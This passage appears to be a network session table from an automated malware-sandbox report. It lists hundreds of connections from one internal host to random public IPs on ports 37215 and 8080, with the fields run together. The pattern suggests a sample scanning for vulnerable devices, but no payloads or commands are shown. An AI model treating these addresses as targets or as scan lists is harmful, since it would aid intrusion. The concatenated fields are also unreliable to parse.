                                                        20139192.168.2.235770412.182.232.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20140192.168.2.234550060.188.249.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20141192.168.2.2336434197.230.124.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20142192.168.2.2340658170.30.15.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20143192.168.2.236067641.232.73.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20144192.168.2.234865041.0.252.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20145192.168.2.234009841.236.161.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20146192.168.2.234836841.79.189.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20147192.168.2.2354148157.67.2.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20148192.168.2.234074041.62.202.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20149192.168.2.233978241.162.80.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20150192.168.2.2354362169.248.156.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20151192.168.2.233717841.165.98.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20152192.168.2.2352364157.182.75.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20153192.168.2.2356436197.173.229.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20154192.168.2.2344246197.245.216.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20155192.168.2.2359812197.255.97.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20156192.168.2.235326841.201.179.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20157192.168.2.2353316197.24.191.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20158192.168.2.2358874197.24.98.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20159192.168.2.2356006157.27.44.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20160192.168.2.235186441.70.189.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20161192.168.2.2353172157.180.181.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20162192.168.2.234263843.255.28.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20163192.168.2.2343440157.10.208.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20164192.168.2.2342998191.71.62.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20165192.168.2.235357688.135.205.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20166192.168.2.2337178157.26.67.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20167192.168.2.2343002197.246.142.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20168192.168.2.2350244157.190.251.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20169192.168.2.235702841.49.87.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20170192.168.2.2344408197.152.193.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20171192.168.2.2343160157.168.70.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20172192.168.2.234357263.211.80.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20173192.168.2.2347702197.25.161.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20174192.168.2.2352104197.127.48.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20175192.168.2.2359268197.91.215.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20176192.168.2.2342452118.8.188.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20177192.168.2.235500441.108.78.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20178192.168.2.2355168221.26.234.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20179192.168.2.2351218128.230.25.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20180192.168.2.2338650195.222.190.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20181192.168.2.2351314125.217.176.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20182192.168.2.2355542109.173.126.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20183192.168.2.2341384197.236.129.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20184192.168.2.2357770141.245.89.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20185192.168.2.2348728216.106.118.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20186192.168.2.235094488.184.246.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20187192.168.2.234178041.111.103.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20188192.168.2.234432041.250.151.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20189192.168.2.234856041.133.31.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20190192.168.2.2338768157.216.173.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20191192.168.2.23340025.19.49.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192192.168.2.2348126136.32.129.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20193192.168.2.2359678116.31.99.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20194192.168.2.2360460197.108.49.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20195192.168.2.2349230157.121.153.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20196192.168.2.2333720197.25.112.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20197192.168.2.2345914147.182.201.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20198192.168.2.2348128197.71.157.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20199192.168.2.234460424.105.39.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20200192.168.2.2342728197.231.226.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20201192.168.2.2338688157.146.150.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20202192.168.2.2347204197.143.115.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20203192.168.2.234714065.113.236.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20204192.168.2.2335448157.9.71.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20205192.168.2.2358698176.133.65.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20206192.168.2.2342116197.78.150.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20207192.168.2.2351998197.35.230.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20208192.168.2.235501441.190.241.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20209192.168.2.2348930197.71.94.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20210192.168.2.234189443.30.124.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20211192.168.2.2340820197.12.34.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20212192.168.2.235537041.208.235.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20213192.168.2.234449041.229.131.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20214192.168.2.2336144148.191.5.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20215192.168.2.235835841.70.229.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20216192.168.2.2347030186.114.201.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20217192.168.2.2350602162.26.207.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20218192.168.2.2344532197.216.125.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20219192.168.2.233858241.147.116.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20220192.168.2.2340952157.39.68.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20221192.168.2.234114641.230.195.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20222192.168.2.2337776157.241.77.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20223192.168.2.2344332157.201.199.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20224192.168.2.2358000197.19.162.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20225192.168.2.234047646.101.84.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20226192.168.2.2356400100.173.62.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20227192.168.2.2349818157.225.251.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20228192.168.2.2353854197.145.145.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20229192.168.2.2357246157.110.249.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20230192.168.2.235808641.132.120.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20231192.168.2.2359250157.240.220.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20232192.168.2.2359926213.106.235.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20233192.168.2.234425441.191.7.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20234192.168.2.2347736122.146.218.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20235192.168.2.233945870.53.173.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20236192.168.2.2350148218.188.243.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20237192.168.2.235817263.167.195.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20238192.168.2.2354144153.42.61.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20239192.168.2.234416627.64.245.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20240192.168.2.234874851.128.209.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20241192.168.2.2357630150.111.139.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20242192.168.2.235534034.232.54.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20243192.168.2.234427465.152.116.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20244192.168.2.2336270111.155.231.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20245192.168.2.233357089.237.82.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20246192.168.2.234410252.108.218.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20247192.168.2.235105418.249.68.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20248192.168.2.233951096.12.75.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20249192.168.2.23429665.134.178.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20250192.168.2.2355504102.135.212.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20251192.168.2.2346568120.12.95.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20252192.168.2.233523018.164.234.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20253192.168.2.2355558136.97.54.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20254192.168.2.234505235.216.79.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20255192.168.2.2346198111.78.90.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20256192.168.2.2358652128.155.16.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20257192.168.2.2355428145.255.168.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20258192.168.2.2346938104.233.93.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20259192.168.2.2339882185.153.183.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20260192.168.2.235796870.143.40.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20261192.168.2.23516749.170.109.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20262192.168.2.2350888181.158.114.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20263192.168.2.2332874144.68.233.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20264192.168.2.2359198131.173.168.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20265192.168.2.2349176219.113.190.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20266192.168.2.2333956186.235.160.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20267192.168.2.233306849.55.54.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20268192.168.2.2340868183.56.72.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20269192.168.2.233455882.113.248.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20270192.168.2.2357500216.144.56.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20271192.168.2.2337732201.149.168.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20272192.168.2.2353628213.15.126.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20273192.168.2.233547093.24.34.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20274192.168.2.2355984151.12.118.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20275192.168.2.233703872.22.202.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20276192.168.2.2360398166.129.110.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20277192.168.2.233732876.216.52.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20278192.168.2.236016042.245.238.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20279192.168.2.233399067.250.251.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20280192.168.2.235741890.137.14.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20281192.168.2.2349822189.121.220.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20282192.168.2.2359720197.237.238.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20283192.168.2.234847469.85.33.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20284192.168.2.2336632149.94.237.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20285192.168.2.23427849.93.201.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20286192.168.2.234955888.216.46.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20287192.168.2.235990052.104.168.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20288192.168.2.234772236.135.105.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20289192.168.2.235940487.68.80.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20290192.168.2.233928839.10.217.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20291192.168.2.2360274222.42.129.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20292192.168.2.234493297.4.149.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20293192.168.2.234450696.42.86.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20294192.168.2.2345712106.48.9.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20295192.168.2.2343530138.166.87.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20296192.168.2.233778034.195.91.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20297192.168.2.2340912222.116.132.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20298192.168.2.2348374212.193.139.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20299192.168.2.2346422154.140.190.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20300192.168.2.236011271.105.63.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20301192.168.2.235046461.58.164.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20302192.168.2.2355840119.40.45.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20303192.168.2.234889666.13.187.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20304192.168.2.2350604175.186.31.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20305192.168.2.2356076103.1.58.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20306192.168.2.23555525.198.145.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20307192.168.2.2352790120.104.85.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20308192.168.2.234631640.0.82.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20309192.168.2.2351834107.5.19.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20310192.168.2.2354486161.196.74.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20311192.168.2.2354750187.200.213.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20312192.168.2.2338154185.115.108.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20313192.168.2.234006463.226.247.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20314192.168.2.233930023.44.95.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20315192.168.2.234103623.25.129.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20316192.168.2.2356266152.146.36.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20317192.168.2.235841837.38.9.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20318192.168.2.2344828167.47.12.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20319192.168.2.2336936137.249.213.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20320192.168.2.235861682.23.144.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20321192.168.2.233508437.77.46.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20322192.168.2.235384267.101.241.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20323192.168.2.235188440.132.58.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20324192.168.2.2360356105.1.234.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20325192.168.2.233731213.238.111.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20326192.168.2.2353968186.49.13.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20327192.168.2.2336866147.182.37.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20328192.168.2.2342272156.78.160.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20329192.168.2.235245682.78.245.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20330192.168.2.234460859.219.233.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20331192.168.2.233560650.73.186.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20332192.168.2.2342584221.7.249.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20333192.168.2.2349906100.173.190.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20334192.168.2.2355646100.59.172.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20335192.168.2.2355594116.221.71.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20336192.168.2.235839094.72.70.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20337192.168.2.2359116168.28.192.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20338192.168.2.233603692.254.170.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20339192.168.2.234371425.124.42.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20340192.168.2.234525482.15.91.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20341192.168.2.2355792107.0.207.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20342192.168.2.234576666.202.80.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20343192.168.2.235948699.131.170.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20344192.168.2.2356412130.123.225.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20345192.168.2.2339322108.71.86.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20346192.168.2.2357546128.154.179.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20347192.168.2.2335056162.251.153.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20348192.168.2.233702236.208.99.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
